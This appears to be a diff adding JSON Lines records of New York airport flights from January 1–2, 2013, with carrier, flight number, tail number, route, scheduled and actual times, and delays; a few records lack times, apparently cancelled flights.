+{"year":2013,"month":1,"day":1,"dep_time":2211,"sched_dep_time":2145,"dep_delay":26,"arr_time":2339,"sched_arr_time":2311,"arr_delay":28,"carrier":"B6","flight":104,"tailnum":"N228JB","origin":"JFK","dest":"BUF","air_time":64,"distance":301,"hour":21,"minute":45,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2217,"sched_dep_time":2229,"dep_delay":-12,"arr_time":249,"sched_arr_time":315,"arr_delay":-26,"carrier":"B6","flight":713,"tailnum":"N547JB","origin":"JFK","dest":"SJU","air_time":191,"distance":1598,"hour":22,"minute":29,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2217,"sched_dep_time":2130,"dep_delay":47,"arr_time":140,"sched_arr_time":27,"arr_delay":73,"carrier":"B6","flight":21,"tailnum":"N516JB","origin":"JFK","dest":"TPA","air_time":163,"distance":1005,"hour":21,"minute":30,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2221,"sched_dep_time":2000,"dep_delay":141,"arr_time":2331,"sched_arr_time":2124,"arr_delay":127,"carrier":"EV","flight":4462,"tailnum":"N13566","origin":"EWR","dest":"BUF","air_time":56,"distance":282,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2224,"sched_dep_time":2200,"dep_delay":24,"arr_time":2324,"sched_arr_time":2316,"arr_delay":8,"carrier":"EV","flight":4206,"tailnum":"N16561","origin":"EWR","dest":"PWM","air_time":47,"distance":284,"hour":22,"minute":0,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2229,"sched_dep_time":2159,"dep_delay":30,"arr_time":149,"sched_arr_time":100,"arr_delay":49,"carrier":"B6","flight":11,"tailnum":"N531JB","origin":"JFK","dest":"FLL","air_time":153,"distance":1069,"hour":21,"minute":59,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2240,"sched_dep_time":2245,"dep_delay":-5,"arr_time":2340,"sched_arr_time":2356,"arr_delay":-16,"carrier":"B6","flight":608,"tailnum":"N279JB","origin":"JFK","dest":"PWM","air_time":44,"distance":273,"hour":22,"minute":45,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2250,"sched_dep_time":2255,"dep_delay":-5,"arr_time":2352,"sched_arr_time":2359,"arr_delay":-7,"carrier":"B6","flight":1018,"tailnum":"N521JB","origin":"JFK","dest":"BOS","air_time":37,"distance":187,"hour":22,"minute":55,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2302,"sched_dep_time":2200,"dep_delay":62,"arr_time":2342,"sched_arr_time":2253,"arr_delay":49,"carrier":"EV","flight":4276,"tailnum":"N13903","origin":"EWR","dest":"BDL","air_time":24,"distance":116,"hour":22,"minute":0,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2306,"sched_dep_time":2245,"dep_delay":21,"arr_time":28,"sched_arr_time":5,"arr_delay":23,"carrier":"B6","flight":30,"tailnum":"N281JB","origin":"JFK","dest":"ROC","air_time":59,"distance":264,"hour":22,"minute":45,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2307,"sched_dep_time":2245,"dep_delay":22,"arr_time":32,"sched_arr_time":2357,"arr_delay":35,"carrier":"B6","flight":128,"tailnum":"N178JB","origin":"JFK","dest":"BTV","air_time":59,"distance":266,"hour":22,"minute":45,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2310,"sched_dep_time":2255,"dep_delay":15,"arr_time":24,"sched_arr_time":15,"arr_delay":9,"carrier":"B6","flight":112,"tailnum":"N646JB","origin":"JFK","dest":"BUF","air_time":57,"distance":301,"hour":22,"minute":55,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2312,"sched_dep_time":2000,"dep_delay":192,"arr_time":21,"sched_arr_time":2110,"arr_delay":191,"carrier":"EV","flight":4312,"tailnum":"N13958","origin":"EWR","dest":"DCA","air_time":44,"distance":199,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2323,"sched_dep_time":2200,"dep_delay":83,"arr_time":22,"sched_arr_time":2313,"arr_delay":69,"carrier":"EV","flight":4257,"tailnum":"N13538","origin":"EWR","dest":"BTV","air_time":44,"distance":266,"hour":22,"minute":0,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2326,"sched_dep_time":2130,"dep_delay":116,"arr_time":131,"sched_arr_time":18,"arr_delay":73,"carrier":"B6","flight":199,"tailnum":"N594JB","origin":"JFK","dest":"LAS","air_time":290,"distance":2248,"hour":21,"minute":30,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2327,"sched_dep_time":2250,"dep_delay":37,"arr_time":32,"sched_arr_time":2359,"arr_delay":33,"carrier":"B6","flight":22,"tailnum":"N639JB","origin":"JFK","dest":"SYR","air_time":45,"distance":209,"hour":22,"minute":50,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2343,"sched_dep_time":1724,"dep_delay":379,"arr_time":314,"sched_arr_time":1938,"arr_delay":456,"carrier":"EV","flight":4321,"tailnum":"N21197","origin":"EWR","dest":"MCI","air_time":222,"distance":1092,"hour":17,"minute":24,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2353,"sched_dep_time":2359,"dep_delay":-6,"arr_time":425,"sched_arr_time":445,"arr_delay":-20,"carrier":"B6","flight":739,"tailnum":"N591JB","origin":"JFK","dest":"PSE","air_time":195,"distance":1617,"hour":23,"minute":59,"time_hour":"2013-01-01 23:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2353,"sched_dep_time":2359,"dep_delay":-6,"arr_time":418,"sched_arr_time":442,"arr_delay":-24,"carrier":"B6","flight":707,"tailnum":"N794JB","origin":"JFK","dest":"SJU","air_time":185,"distance":1598,"hour":23,"minute":59,"time_hour":"2013-01-01 23:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2356,"sched_dep_time":2359,"dep_delay":-3,"arr_time":425,"sched_arr_time":437,"arr_delay":-12,"carrier":"B6","flight":727,"tailnum":"N588JB","origin":"JFK","dest":"BQN","air_time":186,"distance":1576,"hour":23,"minute":59,"time_hour":"2013-01-01 23:00:00"} +{"year":2013,"month":1,"day":1,"sched_dep_time":1630,"sched_arr_time":1815,"carrier":"EV","flight":4308,"tailnum":"N18120","origin":"EWR","dest":"RDU","distance":416,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"sched_dep_time":1935,"sched_arr_time":2240,"carrier":"AA","flight":791,"tailnum":"N3EHAA","origin":"LGA","dest":"DFW","distance":1389,"hour":19,"minute":35,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"sched_dep_time":1500,"sched_arr_time":1825,"carrier":"AA","flight":1925,"tailnum":"N3EVAA","origin":"LGA","dest":"MIA","distance":1096,"hour":15,"minute":0,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"sched_dep_time":600,"sched_arr_time":901,"carrier":"B6","flight":125,"tailnum":"N618JB","origin":"JFK","dest":"FLL","distance":1069,"hour":6,"minute":0,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":42,"sched_dep_time":2359,"dep_delay":43,"arr_time":518,"sched_arr_time":442,"arr_delay":36,"carrier":"B6","flight":707,"tailnum":"N580JB","origin":"JFK","dest":"SJU","air_time":189,"distance":1598,"hour":23,"minute":59,"time_hour":"2013-01-02 23:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":126,"sched_dep_time":2250,"dep_delay":156,"arr_time":233,"sched_arr_time":2359,"arr_delay":154,"carrier":"B6","flight":22,"tailnum":"N636JB","origin":"JFK","dest":"SYR","air_time":49,"distance":209,"hour":22,"minute":50,"time_hour":"2013-01-02 22:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":458,"sched_dep_time":500,"dep_delay":-2,"arr_time":703,"sched_arr_time":650,"arr_delay":13,"carrier":"US","flight":1030,"tailnum":"N162UW","origin":"EWR","dest":"CLT","air_time":108,"distance":529,"hour":5,"minute":0,"time_hour":"2013-01-02 05:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":512,"sched_dep_time":515,"dep_delay":-3,"arr_time":809,"sched_arr_time":819,"arr_delay":-10,"carrier":"UA","flight":1453,"tailnum":"N76515","origin":"EWR","dest":"IAH","air_time":214,"distance":1400,"hour":5,"minute":15,"time_hour":"2013-01-02 05:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":535,"sched_dep_time":540,"dep_delay":-5,"arr_time":831,"sched_arr_time":850,"arr_delay":-19,"carrier":"AA","flight":1141,"tailnum":"N621AA","origin":"JFK","dest":"MIA","air_time":156,"distance":1089,"hour":5,"minute":40,"time_hour":"2013-01-02 05:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":536,"sched_dep_time":529,"dep_delay":7,"arr_time":840,"sched_arr_time":828,"arr_delay":12,"carrier":"UA","flight":407,"tailnum":"N493UA","origin":"LGA","dest":"IAH","air_time":231,"distance":1416,"hour":5,"minute":29,"time_hour":"2013-01-02 05:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":539,"sched_dep_time":545,"dep_delay":-6,"arr_time":959,"sched_arr_time":1022,"arr_delay":-23,"carrier":"B6","flight":725,"tailnum":"N624JB","origin":"JFK","dest":"BQN","air_time":184,"distance":1576,"hour":5,"minute":45,"time_hour":"2013-01-02 05:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":554,"sched_dep_time":600,"dep_delay":-6,"arr_time":845,"sched_arr_time":901,"arr_delay":-16,"carrier":"B6","flight":125,"tailnum":"N637JB","origin":"JFK","dest":"FLL","air_time":156,"distance":1069,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":554,"sched_dep_time":600,"dep_delay":-6,"arr_time":841,"sched_arr_time":851,"arr_delay":-10,"carrier":"B6","flight":49,"tailnum":"N658JB","origin":"JFK","dest":"PBI","air_time":146,"distance":1028,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":554,"sched_dep_time":600,"dep_delay":-6,"arr_time":909,"sched_arr_time":858,"arr_delay":11,"carrier":"B6","flight":371,"tailnum":"N805JB","origin":"LGA","dest":"FLL","air_time":159,"distance":1076,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":555,"sched_dep_time":600,"dep_delay":-5,"arr_time":931,"sched_arr_time":910,"arr_delay":21,"carrier":"AA","flight":707,"tailnum":"N3BEAA","origin":"LGA","dest":"DFW","air_time":255,"distance":1389,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":555,"sched_dep_time":600,"dep_delay":-5,"arr_time":856,"sched_arr_time":856,"arr_delay":0,"carrier":"B6","flight":71,"tailnum":"N806JB","origin":"JFK","dest":"TPA","air_time":158,"distance":1005,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":555,"sched_dep_time":600,"dep_delay":-5,"arr_time":750,"sched_arr_time":757,"arr_delay":-7,"carrier":"DL","flight":731,"tailnum":"N366NB","origin":"LGA","dest":"DTW","air_time":87,"distance":502,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":556,"sched_dep_time":600,"dep_delay":-4,"arr_time":724,"sched_arr_time":723,"arr_delay":1,"carrier":"EV","flight":5708,"tailnum":"N836AS","origin":"LGA","dest":"IAD","air_time":54,"distance":229,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":556,"sched_dep_time":600,"dep_delay":-4,"arr_time":837,"sched_arr_time":837,"arr_delay":0,"carrier":"DL","flight":461,"tailnum":"N618DL","origin":"LGA","dest":"ATL","air_time":128,"distance":762,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":557,"sched_dep_time":605,"dep_delay":-8,"arr_time":832,"sched_arr_time":823,"arr_delay":9,"carrier":"DL","flight":544,"tailnum":"N325US","origin":"LGA","dest":"CVG","air_time":117,"distance":585,"hour":6,"minute":5,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":838,"sched_arr_time":815,"arr_delay":23,"carrier":"FL","flight":345,"tailnum":"N896AT","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":558,"sched_dep_time":600,"dep_delay":-2,"arr_time":916,"sched_arr_time":931,"arr_delay":-15,"carrier":"UA","flight":303,"tailnum":"N505UA","origin":"JFK","dest":"SFO","air_time":341,"distance":2586,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":559,"sched_dep_time":601,"dep_delay":-2,"arr_time":809,"sched_arr_time":901,"arr_delay":-52,"carrier":"UA","flight":402,"tailnum":"N484UA","origin":"EWR","dest":"LAS","air_time":289,"distance":2227,"hour":6,"minute":1,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":559,"sched_dep_time":600,"dep_delay":-1,"arr_time":906,"sched_arr_time":907,"arr_delay":-1,"carrier":"UA","flight":1077,"tailnum":"N12225","origin":"EWR","dest":"MIA","air_time":157,"distance":1085,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":814,"sched_arr_time":749,"arr_delay":25,"carrier":"EV","flight":4334,"tailnum":"N13914","origin":"EWR","dest":"CMH","air_time":98,"distance":463,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":605,"dep_delay":-5,"arr_time":751,"sched_arr_time":818,"arr_delay":-27,"carrier":"EV","flight":5147,"tailnum":"N760EV","origin":"EWR","dest":"MSP","air_time":155,"distance":1008,"hour":6,"minute":5,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":819,"sched_arr_time":815,"arr_delay":4,"carrier":"9E","flight":4171,"tailnum":"N8946A","origin":"EWR","dest":"CVG","air_time":120,"distance":569,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":846,"sched_arr_time":846,"arr_delay":0,"carrier":"B6","flight":79,"tailnum":"N529JB","origin":"JFK","dest":"MCO","air_time":140,"distance":944,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":737,"sched_arr_time":725,"arr_delay":12,"carrier":"WN","flight":3136,"tailnum":"N8311Q","origin":"LGA","dest":"MDW","air_time":117,"distance":725,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":605,"dep_delay":-5,"arr_time":748,"sched_arr_time":805,"arr_delay":-17,"carrier":"MQ","flight":4401,"tailnum":"N713MQ","origin":"LGA","dest":"DTW","air_time":82,"distance":502,"hour":6,"minute":5,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":600,"sched_dep_time":600,"dep_delay":0,"arr_time":747,"sched_arr_time":735,"arr_delay":12,"carrier":"UA","flight":1280,"tailnum":"N62631","origin":"LGA","dest":"ORD","air_time":125,"distance":733,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":602,"sched_dep_time":600,"dep_delay":2,"arr_time":646,"sched_arr_time":659,"arr_delay":-13,"carrier":"US","flight":1833,"tailnum":"N951UW","origin":"LGA","dest":"PHL","air_time":28,"distance":96,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":603,"sched_dep_time":600,"dep_delay":3,"arr_time":733,"sched_arr_time":745,"arr_delay":-12,"carrier":"AA","flight":301,"tailnum":"N3CRAA","origin":"LGA","dest":"ORD","air_time":118,"distance":733,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":603,"sched_dep_time":559,"dep_delay":4,"arr_time":912,"sched_arr_time":916,"arr_delay":-4,"carrier":"UA","flight":1676,"tailnum":"N17229","origin":"EWR","dest":"LAX","air_time":341,"distance":2454,"hour":5,"minute":59,"time_hour":"2013-01-02 05:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":605,"sched_dep_time":600,"dep_delay":5,"arr_time":851,"sched_arr_time":935,"arr_delay":-44,"carrier":"UA","flight":421,"tailnum":"N832UA","origin":"EWR","dest":"SFO","air_time":329,"distance":2565,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":606,"sched_dep_time":610,"dep_delay":-4,"arr_time":846,"sched_arr_time":845,"arr_delay":1,"carrier":"DL","flight":1743,"tailnum":"N387DA","origin":"JFK","dest":"ATL","air_time":129,"distance":760,"hour":6,"minute":10,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":606,"sched_dep_time":610,"dep_delay":-4,"arr_time":825,"sched_arr_time":820,"arr_delay":5,"carrier":"DL","flight":1919,"tailnum":"N915DE","origin":"LGA","dest":"MSP","air_time":167,"distance":1020,"hour":6,"minute":10,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":607,"sched_dep_time":610,"dep_delay":-3,"arr_time":859,"sched_arr_time":910,"arr_delay":-11,"carrier":"AA","flight":1895,"tailnum":"N5ELAA","origin":"EWR","dest":"MIA","air_time":151,"distance":1085,"hour":6,"minute":10,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":609,"sched_dep_time":600,"dep_delay":9,"arr_time":909,"sched_arr_time":854,"arr_delay":15,"carrier":"B6","flight":507,"tailnum":"N630JB","origin":"EWR","dest":"FLL","air_time":158,"distance":1065,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":610,"sched_dep_time":600,"dep_delay":10,"arr_time":826,"sched_arr_time":807,"arr_delay":19,"carrier":"EV","flight":5310,"tailnum":"N740EV","origin":"LGA","dest":"MEM","air_time":172,"distance":963,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":610,"sched_dep_time":615,"dep_delay":-5,"arr_time":854,"sched_arr_time":844,"arr_delay":10,"carrier":"DL","flight":575,"tailnum":"N304DQ","origin":"EWR","dest":"ATL","air_time":124,"distance":746,"hour":6,"minute":15,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":611,"sched_dep_time":600,"dep_delay":11,"arr_time":756,"sched_arr_time":725,"arr_delay":31,"carrier":"WN","flight":1563,"tailnum":"N235WN","origin":"EWR","dest":"MDW","air_time":139,"distance":711,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":612,"sched_dep_time":600,"dep_delay":12,"arr_time":901,"sched_arr_time":850,"arr_delay":11,"carrier":"B6","flight":343,"tailnum":"N579JB","origin":"EWR","dest":"PBI","air_time":146,"distance":1023,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":612,"sched_dep_time":615,"dep_delay":-3,"arr_time":1053,"sched_arr_time":1100,"arr_delay":-7,"carrier":"B6","flight":709,"tailnum":"N629JB","origin":"JFK","dest":"SJU","air_time":191,"distance":1598,"hour":6,"minute":15,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":616,"sched_dep_time":600,"dep_delay":16,"arr_time":1001,"sched_arr_time":917,"arr_delay":44,"carrier":"UA","flight":1141,"tailnum":"N19141","origin":"JFK","dest":"LAX","air_time":354,"distance":2475,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":617,"sched_dep_time":615,"dep_delay":2,"arr_time":837,"sched_arr_time":817,"arr_delay":20,"carrier":"US","flight":1567,"tailnum":"N745VJ","origin":"JFK","dest":"CLT","air_time":106,"distance":541,"hour":6,"minute":15,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":621,"sched_dep_time":610,"dep_delay":11,"arr_time":912,"sched_arr_time":915,"arr_delay":-3,"carrier":"AA","flight":1837,"tailnum":"N3EVAA","origin":"LGA","dest":"MIA","air_time":155,"distance":1096,"hour":6,"minute":10,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":622,"sched_dep_time":630,"dep_delay":-8,"arr_time":820,"sched_arr_time":830,"arr_delay":-10,"carrier":"MQ","flight":4599,"tailnum":"N6EAMQ","origin":"LGA","dest":"MSP","air_time":159,"distance":1020,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":624,"sched_dep_time":600,"dep_delay":24,"arr_time":908,"sched_arr_time":825,"arr_delay":43,"carrier":"MQ","flight":4650,"tailnum":"N513MQ","origin":"LGA","dest":"ATL","air_time":138,"distance":762,"hour":6,"minute":0,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":625,"sched_dep_time":630,"dep_delay":-5,"arr_time":833,"sched_arr_time":830,"arr_delay":3,"carrier":"MQ","flight":4576,"tailnum":"N504MQ","origin":"LGA","dest":"CLT","air_time":106,"distance":544,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":625,"sched_dep_time":629,"dep_delay":-4,"arr_time":935,"sched_arr_time":934,"arr_delay":1,"carrier":"UA","flight":473,"tailnum":"N461UA","origin":"LGA","dest":"IAH","air_time":230,"distance":1416,"hour":6,"minute":29,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":625,"sched_dep_time":630,"dep_delay":-5,"arr_time":954,"sched_arr_time":946,"arr_delay":8,"carrier":"UA","flight":516,"tailnum":"N802UA","origin":"EWR","dest":"DFW","air_time":249,"distance":1372,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":626,"sched_dep_time":630,"dep_delay":-4,"arr_time":850,"sched_arr_time":833,"arr_delay":17,"carrier":"US","flight":1019,"tailnum":"N445US","origin":"EWR","dest":"CLT","air_time":103,"distance":529,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":628,"sched_dep_time":630,"dep_delay":-2,"arr_time":935,"sched_arr_time":932,"arr_delay":3,"carrier":"DL","flight":2137,"tailnum":"N912DE","origin":"LGA","dest":"TPA","air_time":159,"distance":1010,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":628,"sched_dep_time":615,"dep_delay":13,"arr_time":730,"sched_arr_time":715,"arr_delay":15,"carrier":"WN","flight":3641,"tailnum":"N961WN","origin":"EWR","dest":"BWI","air_time":42,"distance":169,"hour":6,"minute":15,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":629,"sched_dep_time":615,"dep_delay":14,"arr_time":746,"sched_arr_time":735,"arr_delay":11,"carrier":"EV","flight":4144,"tailnum":"N15574","origin":"EWR","dest":"IAD","air_time":51,"distance":212,"hour":6,"minute":15,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":629,"sched_dep_time":620,"dep_delay":9,"arr_time":844,"sched_arr_time":827,"arr_delay":17,"carrier":"EV","flight":4460,"tailnum":"N11565","origin":"EWR","dest":"CVG","air_time":118,"distance":569,"hour":6,"minute":20,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":629,"sched_dep_time":630,"dep_delay":-1,"arr_time":1010,"sched_arr_time":1014,"arr_delay":-4,"carrier":"US","flight":245,"tailnum":"N837AW","origin":"EWR","dest":"PHX","air_time":308,"distance":2133,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":630,"sched_dep_time":610,"dep_delay":20,"arr_time":948,"sched_arr_time":921,"arr_delay":27,"carrier":"B6","flight":135,"tailnum":"N665JB","origin":"JFK","dest":"RSW","air_time":177,"distance":1074,"hour":6,"minute":10,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":630,"sched_dep_time":635,"dep_delay":-5,"arr_time":948,"sched_arr_time":942,"arr_delay":6,"carrier":"DL","flight":1879,"tailnum":"N969DL","origin":"LGA","dest":"FLL","air_time":166,"distance":1076,"hour":6,"minute":35,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":630,"sched_dep_time":630,"dep_delay":0,"arr_time":727,"sched_arr_time":740,"arr_delay":-13,"carrier":"WN","flight":4648,"tailnum":"N7735A","origin":"LGA","dest":"BWI","air_time":42,"distance":185,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":632,"sched_dep_time":635,"dep_delay":-3,"arr_time":812,"sched_arr_time":812,"arr_delay":0,"carrier":"EV","flight":4150,"tailnum":"N16987","origin":"EWR","dest":"RDU","air_time":82,"distance":416,"hour":6,"minute":35,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":632,"sched_dep_time":630,"dep_delay":2,"arr_time":941,"sched_arr_time":940,"arr_delay":1,"carrier":"UA","flight":387,"tailnum":"N521UA","origin":"EWR","dest":"LAX","air_time":325,"distance":2454,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":634,"sched_dep_time":630,"dep_delay":4,"arr_time":806,"sched_arr_time":810,"arr_delay":-4,"carrier":"AA","flight":303,"tailnum":"N3DYAA","origin":"LGA","dest":"ORD","air_time":123,"distance":733,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":636,"sched_dep_time":637,"dep_delay":-1,"arr_time":1012,"sched_arr_time":955,"arr_delay":17,"carrier":"UA","flight":1276,"tailnum":"N38727","origin":"EWR","dest":"AUS","air_time":248,"distance":1504,"hour":6,"minute":37,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":636,"sched_dep_time":631,"dep_delay":5,"arr_time":1005,"sched_arr_time":1014,"arr_delay":-9,"carrier":"UA","flight":908,"tailnum":"N406UA","origin":"EWR","dest":"PHX","air_time":299,"distance":2133,"hour":6,"minute":31,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":637,"sched_dep_time":640,"dep_delay":-3,"arr_time":832,"sched_arr_time":809,"arr_delay":23,"carrier":"EV","flight":3829,"tailnum":"N17108","origin":"EWR","dest":"BNA","air_time":138,"distance":748,"hour":6,"minute":40,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":637,"sched_dep_time":630,"dep_delay":7,"arr_time":1012,"sched_arr_time":1018,"arr_delay":-6,"carrier":"US","flight":27,"tailnum":"N545UW","origin":"JFK","dest":"PHX","air_time":312,"distance":2153,"hour":6,"minute":30,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":637,"sched_dep_time":631,"dep_delay":6,"arr_time":821,"sched_arr_time":815,"arr_delay":6,"carrier":"UA","flight":1162,"tailnum":"N39297","origin":"EWR","dest":"CLE","air_time":79,"distance":404,"hour":6,"minute":31,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":640,"sched_dep_time":640,"dep_delay":0,"arr_time":732,"sched_arr_time":749,"arr_delay":-17,"carrier":"B6","flight":1002,"tailnum":"N807JB","origin":"JFK","dest":"BOS","air_time":34,"distance":187,"hour":6,"minute":40,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":640,"sched_dep_time":646,"dep_delay":-6,"arr_time":926,"sched_arr_time":941,"arr_delay":-15,"carrier":"UA","flight":1627,"tailnum":"N37267","origin":"EWR","dest":"PBI","air_time":145,"distance":1023,"hour":6,"minute":46,"time_hour":"2013-01-02 06:00:00"} +{"year":2013,"month":1,"day":2,"dep_time":641,"sched_dep_time":635,"dep_delay":6,"arr_time":926,"sched_arr_time":917,"arr_delay":9,"carrier":"EV","flight":3831,"tailnum":"N12996","origin":"EWR","dest":"ATL","air_time":138,"distance":746,"hour":6,"minute":35,"time_hour":"2013-01-02 06:00:00"} 